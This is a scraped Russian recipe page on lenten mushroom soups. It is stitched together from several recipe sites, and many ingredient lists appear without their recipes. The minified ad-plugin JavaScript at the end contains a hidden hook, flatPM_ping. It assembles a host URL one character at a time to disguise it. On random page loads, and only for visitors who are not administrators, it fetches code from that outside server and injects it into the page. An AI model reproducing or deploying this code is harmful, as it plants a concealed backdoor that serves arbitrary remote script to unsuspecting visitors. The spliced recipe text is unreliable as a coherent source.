Постный суп из шампиньонов

Постные грибные супы

В данном разделе наши авторы делятся лучшими рецептами постных грибных супов с пошаговыми фотографиями и инструкциями. Мы расскажем и покажем, как приготовить постный суп с грибами вкусно!

Похожие подборки рецептов

Упорядочить рецепты по .

Рецепты постных супов с грибами, 37 шт. в коллекции

Ингредиенты

Перловая крупа – 0,5 стакана

Грибы замороженные – 300-400 г

Картофель – 3 шт. (по желанию)

Лук репчатый – 1 головка

Морковь – 0,5-1 штука

Томатный соус – 1-2 ст. ложки (по желанию)

Оливковое масло – для жарки

Ингредиенты

Картофель – 2 шт.

Морковь небольшая – 1 шт.

Шампиньоны – 100 г

Свекла небольшая – 1 шт.

Растительное масло – 2 ст.л.

Овощной бульонный кубик – 1 шт.

Томатная паста – 1 ст.л.

Капуста белокочанная – 150 г

Болгарский перец – 0,5 шт.

Чеснок – 1 зубок

Зелень укропа и петрушки – 10 г

Ингредиенты

Чечевица красная – 1 стакан;

Шампиньоны – 300 грамм;

Лук репчатый – 1 шт;

Специи (орегано, базилик, лавровый лист, душистый перец) – по вкусу;

Петрушка – небольшой пучок.

Ингредиенты

Картофель – 400 грамм

Гречневая крупа – 200 грамм

Лук репчатый – 1 шт.

Масло подсолнечное – 25 грамм

Петрушка – 3 веточки

Перец чёрный молотый – по вкусу

Лавровый лист – 2 шт.

Ингредиенты

Картофель – 200 г

Лук репчатый – 1 шт.

Растительное масло – 1 ст.л.

Специи – по вкусу

Лавровый лист – 1 шт.

Овощной бульонный кубик – 1 шт.

Ингредиенты

Сушеные грибы – 2 горсти

Перловка – от 4-х ст.л.

Картофель – 2 шт.

Морковь небольшая – 1 шт.

Растительное масло – 1-2 ст.л.

Ингредиенты

Фасоль красная – 100 г

Лук репчатый – 1 шт.

Картофель – 2 шт.

Шампиньоны – 2-3 шт.

Масло растительное – 2 ст.л.

Зелень – по вкусу

Соль, специи – по вкусу

Вода (овощной бульон) – 1,2 л

Ингредиенты

Шампиньоны – 200 г

Крупа перловая – 30 г

Картофель – 2-3 шт.

Лук репчатый – 1 шт.

Чеснок – 2 дольки

Сельдерей – 2 стебля

Имбирь молотый – 1 ч.л.

Соль, перец – по вкусу

Ингредиенты

Грибы белые сушеные – 40 г

Лук репчатый – 150 г

Картофель – 150 г

Соль, перец, лавровый лист – по вкусу

Ингредиенты

Капуста свежая – 0,5 кг.

Шампиньоны – 250 г

Картофель – 2-3 шт.

Морковь свежая или по-корейски – 50-100 г

Растительное масло – для жарки

Томатная паста или соус – по желанию

Соль и специи по вкусу

Ингредиенты

Грибы сухие – 50 г

Грибы соленые – 100 г

Шампиньоны – 3-5 шт.

Соленые огурцы – 2 шт.

Чеснок – 3 зубчика

Томатная паста – 1 ст.л.

Рассол от огурцов – 1/3 стакана

Грибной бульон – 1 л

Лавровый лист – 2 шт.

Укроп свежий – 2-3 веточки

Лук зеленый свежий – 4 шт.

Петрушка свежая – 2-3 веточки

Лимон – для подачи

Ингредиенты

Грибы белые сушеные – 50 г

Картофель – 200 г

Лук репчатый – 150 г

Масло рафинированное – 20 г

Лапша домашняя – 50 г

Лавровый лист – 2 шт.

Тимьян (чабрец) сухой – 1 ч.л.

Укроп сухой – 2 ч.л.

Перец черный – 0.5 ч.л.

Ингредиенты

Грибы сухие – 30 г

Картофель – 3 шт.

Лук репчатый – 1 шт.

Огурцы соленые – 3-4 шт.

Томатная паста – 1.5 ст.л.

Лавровый лист – по желанию

Перец черный молотый

Сахар – 1 щепотка

Масло растительное – 3 ст.л.

Ингредиенты

Грибы сушёные – 40 г

Картофель – 150 г

Крупа перловая – 50 г

Лавровый лист – 2 шт.

Лук репчатый – 1 шт.

Масло подсолнечное рафинированное – 2 ст.л.

Огурцы маринованные – 50 г

Перец чёрный молотый – по вкусу

Томатная паста – 1.5 ст.л.

Чеснок – 3 зубчика

Ингредиенты

Шампиньоны – 500 г

Патиссоны – 700 г

Картофель – 200 г

Чеснок – 2 зубчика

Соль, перец – по вкусу

Масло растительное – 3 ст.л.

Майоран – по вкусу

Петрушка – по вкусу

Ингредиенты

Картофель – 2 штуки;

Морковь – 1 штука;

Лук репчатый – 1 штука;

Чечевица красная – 150 грамм;

Грибы “Лисички” – 150 грамм;

Подсолнечное масло – 40 миллилитров;

Соль поваренная – 1 чайная ложка;

Петрушка или укроп – 10 грамм.

Ингредиенты

Капуста цветная – 200 г

Читать еще:  Торт с маскарпоне и вишней

Картофель – 1 шт.

Фасоль стручковая – горстка

Перец болгарский – 0,5 шт.

Чеснок – 2 зубчика

Шампиньоны свежие – 2 шт.

Соевый соус сладкий – 1,5 ст.л.

Смесь перцев (горошком) – 1/3 ч.л.

Лавровый лист – 1 шт.

Укроп – по вкусу

Ингредиенты

Сушеные грибы (у меня белые) – 50 г

Картофель – 550 г

Репчатый лук – 100 г

Лавровый лист – 2 шт.

Перец ч.м. – по вкусу

Растительное масло – для обжаривания

Ингредиенты

Баклажан – 200 г

Шампиньоны – 5 шт.

Картофель – 1 шт.

Лук зеленый – 15 г

Чеснок – 1 зубчик

Укроп – 4 веточки

Перец ч.м. – по вкусу

Масло растительное – 10 г

Ингредиенты

Сухие белые грибы – 30 г

Картофель – 3 шт.

Лук репчатый – 1 шт.

Рафинированное подсолнечное масло – для жарки овощей

Гречневая крупа – 80 г

Ингредиенты

Грибы свежие или замороженные – 300 г

Грибы сухие – 2 горсти

Грибы маринованные – от 100 г

Капуста квашеная – от 250 г

Капуста свежая – около 250 г

Помидоры – 100 г

Томатный соус – по вкусу

Растительное масло – для жарки

Ароматные травы – для подачи

Ингредиенты

Масло растительное – 3 ст.л.

Лук репчатый (среднего размера) – 3 шт.

Грибы – 200-300 г

Сушеные белые или другие ароматные грибы – 25 г

Чеснок – 2-3 зубчика

Лавровый лист – 2 шт.

Перец черный молотый – 0.5 ч.л. (по вкусу)

Паприка молотая – 2-2.5 ч.л.

Горячая вода – 1,4-1.5 л

Картофель – 3 шт.

Соленые огурцы – 3 шт. (по вкусу)

Маслины/оливки или их смесь – 6 ст.л.

Томатная паста – 5 ст.л.

Лимон – 1 кружок

Свежая зелень – по вкусу

Тмин молотый – по вкусу

Кориандр молотый – по вкусу

Дополнительно:

Сметана – по вкусу

Ингредиенты

Грибы лесные замороженные – 150 г

Картофель – 1 шт.

Стебель сельдерея – 0,5 шт.

Лук репчатый – 0,5 шт.

Масло подсолнечное – 50 г

Вермишель – 3 ст.л.

Ингредиенты

Грибы сухие – 40 г

Картофель – 3 шт.

Лук репчатый – 1 шт.

Чеснок – 2 дольки

Вермишель – по вкусу

Соль, перец – по вкусу

Ингредиенты

Грибы белые – 250 г

Лук репчатый – 0,5 шт.

Масло подсолнечное – 2 ст.л.

Картофель – 100 г

Вермишель – 10 г

Чеснок – 1 зубчик

Перец горошком – 2 шт.

Лист лавровый – 1 шт.

Лимонный сок – 0,5 ч.л.

Для подачи:

Ингредиенты

Грибы сухие (в идеале – белые) – 40 г

Картошка – 300 г

Растительное масло – 1 ст.л.

Ингредиенты

Грибы сушенные – 30 г

Лук репчатый – 1 шт.

Картофель – 1 шт.

Растительное масло – 2-3 ст.л.

Ингредиенты

Картофель – 3 шт.

Лук репчатый – 1 шт.

Чеснок – 2 дольки

Грибы подосиновики сухие – 30 г

Домашняя лапша – по вкусу

Соль, перец – по вкусу

Лавровый лист – 1-2 шт.

Ингредиенты

Капуста белокочанная – 80 г

Картофель – 60 г

Томатная паста – 15 г

Томатный соус – 50 г

Масло подсолнечное – 60 г

Лавровый лист – 1-2 шт.

Ингредиенты

Картофель – 2 шт.

Чеснок – 2 зубчика

Корень сельдерея – 50 г

Шампиньоны – 50 г

Растительное масло – 30 мл

Соль, острый перец – по вкусу

Свежая зелень – для подачи

Поделитесь коллекцией рецептов с друзьями

АЙМКУК © 2007-2020 год. Все права защищены.
Использование материалов сайта без письменного разрешения, запрещено законом об Авторских правах Гражданского Кодекса Российской Федерации от 18 декабря 2006 года N 230-ФЗ

Постный суп из шампиньонов

Постный суп из шампиньонов обязательно оценят любители грибных наваристых первый блюд. Суп идеально подходит для семейного обеда в пост.

Ингредиенты

  • 300 гр шампиньонов
  • 3 картофелины
  • 2 средние луковицы
  • 1 крупная морковь
  • 50 гр вермишели
  • небольшой пучок укропа и петрушки
  • соль, перец по вкусу

Рецепт приготовления блюда в домашних условиях

  1. Предварительно приготовить все ингредиенты для супа: картофель с луком и морковью очистить от кожуры, грибы тщательно вымыть и просушить.
  2. Лук порезать мелкими кубиками, морковь натереть на крупной терке, грибы порезать средними кусочками.
  3. В сковороде или кастрюле с толстым дном разогреть 2-3 ст.л. растительного масла и выложить лук с морковью. Обжаривать овощи вместе, помешивая лопаткой, около 5 минут на слабом огне.
  4. Затем добавить в сковороду/кастрюлю шампиньоны и тушить их вместе с овощами 2-3 минуты. Влить в кастрюлю с овощами и грибами 1 л кипятка (либо переложить все из сковороды в кастрюлю с водой), посолить, всыпать картошку и варить 10 минут при слабом кипении.
  5. Следом за картошкой всыпать в грибной суп вермишель и варить еще 5 минут. Зелень промыть и мелко нарезать ножом, добавить в суп и снять его с огня. Накрыть кастрюлю крышкой и оставить как минимум на 15 минут.
  6. Разлить постный суп с шампиньонами по тарелкам и подавать к столу горячим. Приятного аппетита!

Похожие рецепты:

Деревенский чечевичный суп в хлебе

Суп-пюре с креветками

Овощной суп на молоке

Крем-суп из тыквы

Ваши отзывы и советы

Новое на сайте:

К сезону десертов:

120 мин. / Средне

480 мин. / Средне

480 мин. / Сложно

180 мин. / Сложно

120 мин. / Средне

Мы в соцсетях

FOODideas (идеи для еды) – это сайт, посвящённый искусству приготовления пищи дома, где собраны лучшие рецепты кулинарных блюд с фотографиями и подробными пошаговыми инструкциями, специально, чтобы вы могли приготовить любое, даже самое сложное блюдо в домашних условиях. Так же наши рецепты вы можете читать в нашем Яндекс Дзен канале – Foodideas Zen

Супы из шампиньонов: постные рецепты

Грибной суп из шампиньонов – довольно популярное постное блюдо, ведь оно вкусное, кроме того, сытное и питательное, несмотря на то, что калорий в нем не много. Поэтому женский журнал поделится несколькими рецептами с вами, так как их огромное множество, и иногда даже трудно выбрать, какой подойдет для вас, а какой нет. Мы отобрали только самые популярные супы, их легко готовить, они не дорого обходятся, и самое главное, полезны для здоровья и вкусны.

Вообще, сами грибы – шампиньоны, можно есть даже сырыми. Это любимое лакомство многих лесных зверей, а все потому, что они богаты витаминами, белками и минералами. Грибной суп можно сварить из любых съедобных грибов, и даже с фрикадельками.

Их привилегия еще и в том, что они недорого стоят. Можно сделать суп с белыми грибами, но он обойдется вам в приличную сумму, а по вкусу не будет практически отличаться от нашего. Так что, можно смело приступать к приготовлению, и наслаждаться ароматным супом из шампиньонов.

Простой грибной суп

Приготовить такой грибной суп довольно просто. Он готовится на объем из расчета на 3литра, поэтому вы можете добавить ингредиенты, если кастрюля будет больше, и чуть убавить, если готовите совсем немного.

  1. Шампиньоны следует промыть, и порезать на четверти или половинки, если грибы маленькие. Если же они большие, то нарежьте их пластами, и сложите в кастрюлю.
  2. Залейте грибы водой, и сварите их в подсоленной воде.
  3. Пока варится бульон, вы должны приготовить компоненты для зажарки. Для этого следует порезать мелко лук, а морковь натереть на средней терке.
  4. Когда бульон проварится немного, а для этого вода должна закипеть и повариться 5 минут, отделите его от грибов с помощью дуршлага. Естественно, не выкидывайте грибы, а то некоторые так делают.
  5. Обжарьте шампиньоны вместе с луком и морковкой на сковороде, добавив немного растительного масла.
  6. Порежьте картофель небольшими кусочками, как обычно используете для супов, и положите его в бульон. Теперь доведите бульон до кипения, после чего – добавьте грибы с зажаркой.
  7. Промойте и мелко нарежьте зелень.
  8. Пока режется зелень, ваш суп из грибов уже варится, и остается только добавить вермишель. Лучше использовать из твердых сортов, тогда макароны не будут разваливаться.
  9. Когда сварится вермишель, добавьте зелень, выключите суп, и накройте его крышкой. Естественно, перед этим, следует немного добавить специи, если желаете. Пусть он настоится около 10 минут, и можно подавать на стол.

Все, простой суп из шампиньонов готов, его можно подавать на стол.

Постный суп с шампиньонами

  1. Закипятите 2,5литра воды в кастрюле. Пока она греется. Следует порезать лук на небольшие кусочки.
  2. Промойте хорошо пшено несколько раз, чтобы убрать весь сор, а также обдайте его кипятком.
  3. Порежьте картофель средними кусочками, которые вам удобно кушать в супе.
  4. Когда закипит вода, то следует добавить в нее пшено и картофель. Можно сразу кидать оба продукта. Сварите картошку, это займет примерно 20 минут.
  5. В это время вы должны помыть грибы, и нарезать их удобными для употребления кусочками. Разогрейте сковороду, добавьте немного подсолнечного масла, и киньте на нее грибы. К шампиньонам добавьте лук, и обжарьте до готовности, но не следует пережаривать.
  6. Теперь добавьте зажарку в суп, а также специи и соль по вкусу.
  7. Сделайте маленький огонь, накройте крышкой, и проварите 5-7 минут.

Все, постный суп из шампиньонов готов, его можно приготовить и с перловкой . А в это время остается подумать, что подать на второе, или посмотреть в наших статьях. Приятного аппетита!

Постный грибной суп из шампиньонов

Альтернативой всем овощным супам, пользующимся большой популярностью в период поста, могут стать супы на грибной основе. Разнообразие используемых грибов не уступает овощному. В ход могут идти как обычные шампиньоны или вешенки, так и более ароматные лесные грибы или смесь первых со вторыми. Ниже мы подробнее поговорим об одном из наиболее доступных вариантов – постном грибном супе из шампиньонов.

Постный грибной суп-пюре из шампиньонов – рецепт

Сами по себе шампиньоны наделены едва ощутимым ароматом, а потому всяческие добавки вроде интенсивных специй, ароматных кореньев и грибов лишь приветствуются. В этом рецепте мы решили воссоздать аналог супа приготовленного на костре, благодаря капле жидкого дыма.

  • шампиньоны – 440 г;
  • соевый соус – 45 мл;
  • кленовый сироп – 25 мл;
  • жидкий дым – 10 мл;
  • репчатый лук – 145 г;
  • чеснок – 3 зубка;
  • консервированная фасоль – 520 г;
  • дижонская горчица – 25 г;
  • соевое молоко – 355 мл.

Нарезанные грибы и лук спассеруйте вместе на протяжении 7 минут. Когда вся влага из грибов испарится, а зажарка приобретет золотистый оттенок, влейте к ней кленовый сироп и добавьте чеснок. Около минуты дайте содержимому карамелизироваться, после чего положите фасоль, добавьте горчицу и плесните жидкий дым. Залейте все соевым молоком (или любым другим растительным молоком) и оставьте вариться 10-12 минут. Готовый суп взбейте блендером, пока не получите требуемую консистенцию.

Постный грибной суп из шампиньонов с гречкой

Для пущей сытности рекомендуем добавлять в крем-супы крупы. В ход может идти все, что угодно и даже гарнир, оставшийся после вчерашнего ужина. Самые популярные варианты: перловка, рис и гречка. Мы остановили свое внимание на последнем варианте.

  • репчатый лук – 135 г;
  • шампиньоны – 1,2 кг;
  • веточки розмарина – 2 шт.;
  • картофель – 390 г;
  • морковь – 115 г;
  • гречка – 55 г;
  • листья лавра – 4 шт.;
  • овощной бульон – 3 л;
  • мука – 35 г.

Приготовьте базовую луково-грибную зажарку с морковью. Когда лишняя влага выйдет, добавьте измельченные розмариновые листочки, затем дождитесь, когда те пустят свой аромат и посыпьте все мукой. Спустя полминуты влейте бульон и добавьте небольшие кусочки картофеля. Следом за клубнями всыпьте гречневую крупу и оставьте все бурлить на среднем огне с листиком лавра до тех пор, пока крупа и картофель не станут мягкими.

Постный грибной суп из шампиньонов можно также сделать в мультиварке, достаточно обжарить ингредиенты в том же порядке включив «Выпечку», а затем, после добавления жидкости и картофеля с крупой, перейти в режим «Тушение» на полчаса.

Как приготовить постный грибной суп из шампиньонов с вермишелью?

Это не стандартный суп с вермишелью из столовой, а его современная азиатская вариация, отличающаяся заметно большим разнообразием вкуса и отменными вкусовыми характеристиками.

  • тофу – 75 г;
  • брокколи – 115 г;
  • шампиньоны – 160 г;
  • горошек – 110 г;
  • сладкий перец -85 г;
  • перья зеленого лука – 3 шт.;
  • корень имбиря – 2 см;
  • морковь – 1 шт.;
  • порошок карри – 1 ч. ложка;
  • кокосовое молоко – 235 мл;
  • овощной бульон – 930 мл;
  • рисовая вермишель – 90 г;
  • зелень петрушки.

Приготовьте зажарку из моркови и грибов. Когда лишняя грибная влага испарится, положите сладкий перец, добавьте тертый имбирь и карри. Залейте все овощным бульоном, всыпьте горошек и положите соцветия брокколи. Когда брокколи размягчится – настало время лапши, на ее приготовление уйдет не больше минуты, после чего суп дополняют кокосовым молоком и подают с зеленью лука и петрушки.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Оцените рецепт ОценитьПрименить